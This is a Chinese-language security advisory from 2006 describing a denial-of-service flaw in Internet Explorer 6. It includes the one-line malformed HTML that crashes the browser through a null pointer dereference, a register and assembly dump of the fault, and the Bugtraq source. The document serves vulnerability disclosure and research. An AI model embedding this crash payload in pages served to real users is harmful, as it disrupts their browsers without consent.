首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer畸形HTML解析拒绝服务漏洞

发布日期:2006-05-26
更新日期:2006-05-26

受影响系统:
Microsoft Internet Explorer <= 6.0.2900.2180.xpsp_sp2
描述:
BUGTRAQ  ID: 18112

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft IE对畸形请求的处理上存在问题,远程攻击者可能利用此漏洞导致IE浏览器崩溃。

如果诱骗IE访问以下HTML代码的话:

<applet><h4><title> </title><base>

就会触发空指针引用,导致拒绝服务。

以下是访问破坏时的寄存器值和ASM dump:

> eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268
> edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c
>
>         7d6d2d7d e868f9ffff       call    mshtml+0x2226ea (7d6d26ea)
>         7d6d2d82 50               push    eax
>         7d6d2d83 e835f8ffff       call    mshtml+0x2225bd (7d6d25bd)
>         7d6d2d88 85c0             test    eax,eax
>         7d6d2d8a 8945f8           mov     [ebp-0x8],eax
>         7d6d2d8d 0f85c4020000     jne     mshtml+0x223057 (7d6d3057)
>         7d6d2d93 8b461c           mov     eax,[esi+0x1c]
>         7d6d2d96 8b4e18           mov     ecx,[esi+0x18]
>         7d6d2d99 8365f400         and     dword ptr [ebp-0xc],0x0
>         7d6d2d9d 8365fc00         and     dword ptr [ebp-0x4],0x0
>         7d6d2da1 8b7e14           mov     edi,[esi+0x14]
>         7d6d2da4 8945f0           mov     [ebp-0x10],eax
>         7d6d2da7 e88462e4ff       call    mshtml+0x69030 (7d519030)
>         7d6d2dac 3bc7             cmp     eax,edi
>         7d6d2dae 0f8402020000     je      mshtml+0x222fb6 (7d6d2fb6)
> FAULT ->7d6d2db4 8b07             mov     eax,[edi]
>                                           ds:0023:00000000=????????
>         7d6d2db6 8bc8             mov     ecx,eax
>         7d6d2db8 83e10f           and     ecx,0xf
>         7d6d2dbb 49               dec     ecx
>         7d6d2dbc 0f849c010000     je      mshtml+0x222f5e (7d6d2f5e)
>         7d6d2dc2 49               dec     ecx
>         7d6d2dc3 0f84b3000000     je      mshtml+0x222e7c (7d6d2e7c)
>         7d6d2dc9 49               dec     ecx
>         7d6d2dca 49               dec     ecx
>         7d6d2dcb 746c             jz      mshtml+0x222e39 (7d6d2e39)
>         7d6d2dcd 83e904           sub     ecx,0x4
>         7d6d2dd0 0f85a5010000     jne     mshtml+0x222f7b (7d6d2f7b)
>         7d6d2dd6 8bcf             mov     ecx,edi
>         7d6d2dd8 e8482ffeff       call    mshtml+0x205d25 (7d6b5d25)
>         7d6d2ddd 85c0             test    eax,eax
>         7d6d2ddf 7430             jz      mshtml+0x222e11 (7d6d2e11)
>         7d6d2de1 837e0400         cmp     dword ptr [esi+0x4],0x0

<*来源:Thomas Waldegger (bugtraq@morph3us.org
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114866119325689&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<applet><h4><title> </title><base>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3285
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障